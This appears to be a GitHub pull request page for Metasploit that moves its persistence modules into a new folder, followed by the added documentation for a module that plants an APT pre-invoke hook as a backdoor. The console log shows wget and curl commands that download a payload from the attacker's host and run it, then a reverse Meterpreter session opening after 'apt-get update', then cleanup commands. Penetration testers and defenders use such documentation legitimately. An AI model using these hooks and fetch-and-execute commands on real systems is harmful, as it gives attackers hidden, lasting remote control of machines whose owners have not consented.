Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Persistence directory #19815

Open
wants to merge 92 commits into
base: master
Choose a base branch
from
+4,787 −2,509
Open

Persistence directory #19815

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
92 commits
Select commit Hold shift + click to select a range
62b951d
move persistence files to their own folder
h00die Jan 17, 2025
b9539bb
rubocop persistence modules
h00die Jan 17, 2025
e3545f3
msftidy changes for persistence folder
h00die Jan 17, 2025
8138fe1
finish renaming persistence docs
h00die Jan 19, 2025
d56d7ab
move persistence under exploit
h00die Jan 19, 2025
9b7cc8f
modernization, updates, testing of apt_package_manager
h00die Jan 20, 2025
1fbd81d
modernization, updates, testing of autostart
h00die Jan 20, 2025
1877601
modernization, updates, testing of bash_profile
h00die Jan 20, 2025
43244ca
create persistence lib to standardize options
h00die Jan 20, 2025
5039513
modernization, updates, testing of cron
h00die Jan 20, 2025
9de657e
modernization, updates, testing of persistence modules
h00die Jan 20, 2025
d57237e
modernization, updates, testing of motd
h00die Jan 20, 2025
a2179ab
modernization, updates, testing of rc.local
h00die Jan 20, 2025
15cfde7
modernization, updates, testing of linux service
h00die Jan 20, 2025
c035123
modernization, updates, testing of linux yum module
h00die Jan 20, 2025
d65f2d4
further adjustments for persistence
h00die Jan 20, 2025
7cfc28a
modernization, updates, testing of obsidian module
h00die Jan 20, 2025
e76aa56
modernization, updates, testing of launch_plist module
h00die Jan 20, 2025
a1a8c26
add link with lib
h00die Jan 20, 2025
770930d
storing unfinished modules
h00die Jan 20, 2025
20cdc45
wmi persistence module
h00die Jan 28, 2025
1d19dc2
vss persistence
h00die Jan 28, 2025
faad050
sticky keys update
h00die Jan 29, 2025
3607d5b
sticky keys update
h00die Jan 29, 2025
ca16ee2
sticky keys update
h00die Jan 29, 2025
cda0881
windows ssh keys update
h00die Jan 29, 2025
74acdf2
feat: persistence mixin draft
dledda-r7 Jan 29, 2025
7542fa1
feat: draft bash_profile using persistence mixin
dledda-r7 Jan 29, 2025
772ac96
windows persistence service conversion
h00die Jan 29, 2025
6b45fb3
feat: persistence mixin and bash_profile persistence
dledda-r7 Jan 30, 2025
7b45372
system_v persistence pulled out from service module
h00die Jan 30, 2025
4af21a6
Merge remote-tracking branch 'origin/persistence_dir' into persistenc…
h00die Jan 30, 2025
5a5e813
linux service persistence module split apart
h00die Jan 31, 2025
186b74c
feat: persistence mixin cleanup via rc-file
dledda-r7 Jan 31, 2025
782bd3b
feat: bash_profile persistence cleanup rc-file
dledda-r7 Jan 31, 2025
57dd846
feat: apt_package_manager persistence cleanup rc-file
dledda-r7 Jan 31, 2025
e154902
feat: autostart persistence cleanup rc-file
dledda-r7 Jan 31, 2025
490e810
rename linux persistence services to inits
h00die Jan 31, 2025
1da8e44
unix at persistence
h00die Jan 31, 2025
e62acab
s4u persistence module
h00die Jan 31, 2025
3bbf381
windows registry persistence module
h00die Jan 31, 2025
868775e
windows ps_persist
h00die Jan 31, 2025
6e29418
process_exit_debugger udpates
h00die Jan 31, 2025
a17e152
persistence consistencies
h00die Jan 31, 2025
5188b20
windows persistence moved to registry_vbs
h00die Feb 1, 2025
2228190
windows persistence moved to registry_vbs
h00die Feb 1, 2025
c159660
windows persistence small fixes
h00die Feb 1, 2025
5dee099
windows persistence_exe updates
h00die Feb 1, 2025
3a079b1
windows persistence_exe updates
h00die Feb 1, 2025
5c090d8
rubocop fixes
h00die Feb 1, 2025
e8fafed
fix notes metadata for unix at persistence
h00die Feb 1, 2025
c36f98a
create persistence suggester
h00die Feb 2, 2025
7058546
create persistence suggester
h00die Feb 2, 2025
fb8e740
fixes for persistence checks
h00die Feb 2, 2025
7d47bee
fix: add cleanup function persistence mixin
dledda-r7 Feb 3, 2025
4519ee9
fix: removed cleanup_persistence function in bash_profile
dledda-r7 Feb 3, 2025
5deede9
fix: cron persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
1a74cb4
fix: init_openrc persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
8c336f8
fix: init_systemd persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
68a1008
fix: init_sysvinit persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
c06e2ab
fix: motd and init_upstart persistence with new mixin and cleanup rc …
dledda-r7 Feb 4, 2025
b41aa6b
fix: rc_local persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
d7b55e7
fix: sshkey persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
b9141fc
fix: fix missing newline cleanup on init_systemd
dledda-r7 Feb 4, 2025
9ceb60d
fix: yum_package_manager persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
0762a13
fix: obsidian persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
c07e28f
fix: launch_plist persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
7db3160
fix: at persistence with new mixin and cleanup rc file
dledda-r7 Feb 4, 2025
0ea714e
Merge remote-tracking branch 'origin/persistence_dir' into persistenc…
h00die Feb 4, 2025
6589d78
working on autostart
h00die Feb 5, 2025
78c7a96
working on autostart
h00die Feb 6, 2025
a935ce0
at(1) working
h00die Feb 6, 2025
d902ba8
autostart finished
h00die Feb 6, 2025
e2fd131
bash_profile finished
h00die Feb 7, 2025
364d1a5
fix: s4u persistence with new mixin and cleanup rc file
dledda-r7 Feb 6, 2025
a3dcbf6
fix: process_exit_debugger persistence with new mixin and cleanup rc …
dledda-r7 Feb 6, 2025
37cd4c1
x: s4u persistence check method and cleanup fix
dledda-r7 Feb 7, 2025
fe6da60
fix: registry persistence with new mixin and cleanup rc file
dledda-r7 Feb 7, 2025
4fdd4ac
fix: vss persistence with new mixin and cleanup rc file
dledda-r7 Feb 7, 2025
0ecac47
fix: registry_vbs persistence with new mixin and cleanup rc file
dledda-r7 Feb 7, 2025
ce1835b
fix: persistence_exe persistence with new mixin and cleanup rc file
dledda-r7 Feb 7, 2025
f6159e2
fix: ps_persist persistence with new mixin and cleanup rc file
dledda-r7 Feb 7, 2025
a190de4
fix: service persistence with new mixin and cleanup rc file
dledda-r7 Feb 7, 2025
fa71e06
fix: persistence_exe install_persistence instead of run
dledda-r7 Feb 7, 2025
1585533
motd persistence
h00die Feb 7, 2025
a29103a
various persistence updates
h00die Feb 7, 2025
fbf4520
rc.local persistence
h00die Feb 9, 2025
539e8d2
persistence consistencies
h00die Feb 9, 2025
9af6dd6
various persistence updates
h00die Feb 9, 2025
dffa622
openrc persistence
h00die Feb 9, 2025
4b3ffe0
timespec for at(1) persistence module
h00die Feb 11, 2025
4be5124
multi sshkey module, currently bugged
h00die Feb 12, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
66 changes: 0 additions & 66 deletions documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
View file
Open in desktop

This file was deleted.

22 changes: 0 additions & 22 deletions documentation/modules/exploit/linux/local/autostart_persistence.md
View file
Open in desktop

This file was deleted.

50 changes: 0 additions & 50 deletions documentation/modules/exploit/linux/local/bash_profile_persistence.md
View file
Open in desktop

This file was deleted.

37 changes: 0 additions & 37 deletions documentation/modules/exploit/linux/local/motd_persistence.md
View file
Open in desktop

This file was deleted.

46 changes: 0 additions & 46 deletions documentation/modules/exploit/linux/local/rc_local_persistence.md
View file
Open in desktop

This file was deleted.

150 changes: 150 additions & 0 deletions documentation/modules/exploit/linux/persistence/apt_package_manager.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,150 @@
## Vulnerable Application

This module will run a payload when the apt package manager is used.
This module creates a pre-invoke hook for APT in `apt.conf.d`.
The hook name syntax is numeric followed by text.

Verified on Ubuntu 22.04

## Verification Steps

1. Exploit a box that uses APT
2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
3. `use exploit/linux/persistence/apt_package_manager`
4. `set SESSION <id>`
5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
6. `exploit`

When the system runs `apt-get update` the payload will launch.

## Options

**BACKDOOR_NAME**

Name of backdoor executable. Defaults to a random name

**HOOKNAME**

Name of pre-invoke hook to be installed in `/etc/apt/apt.conf.d/`. Pre-invoke hook name syntax is numeric followed by text.

**WritableDir**

Writable directory for backdoor. Default is (`/tmp/`)

## Scenarios

### Tested on Ubuntu 22.04

Initial access vector via web delivery

```
$ ./msfconsole -q
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Z73D1DUW --no-check-certificate http://111.111.1.111:8181/l; chmod +x Z73D1DUW; ./Z73D1DUW& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 222.222.2.22 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:51076) at 2025-02-04 17:40:52 -0500
sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ 222.222.2.22 111.111.1.111:4545 -> 222.222.2.22:51076 (222.222.2.22)
```

Persistence

```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/apt_package_manager
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > check
[*] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > exploit
[*] Command to run on remote host: curl -so ./xTOLdQoOTv http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xTOLdQoOTv;./xTOLdQoOTv&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[*] Attempting to write hook:
[*] Wrote /etc/apt/apt.conf.d/76skoGqswo
[*] Backdoor uploaded /tmp/erNOJV96u
[+] Backdoor will run on next APT update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc

[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > jobs

Jobs
====

Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/script/web_delivery linux/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4545
1 Exploit: linux/persistence/apt_package_manager cmd/linux/http/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4444

[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
```

Run `sudo apt-get update` on the target.

```
[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.22 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:49804) at 2025-02-04 17:43:06 -0500

[msf](Jobs:2 Agents:2) exploit(linux/persistence/apt_package_manager) > sessions -i 2
[*] Starting interaction with 2...

(Meterpreter 2)(/tmp) > sysinfo
Computer : 222.222.2.22
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 2)(/tmp) >
```

#### Cleanup

```
(Meterpreter 2)(/tmp) > resource /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u
```
Loading
Loading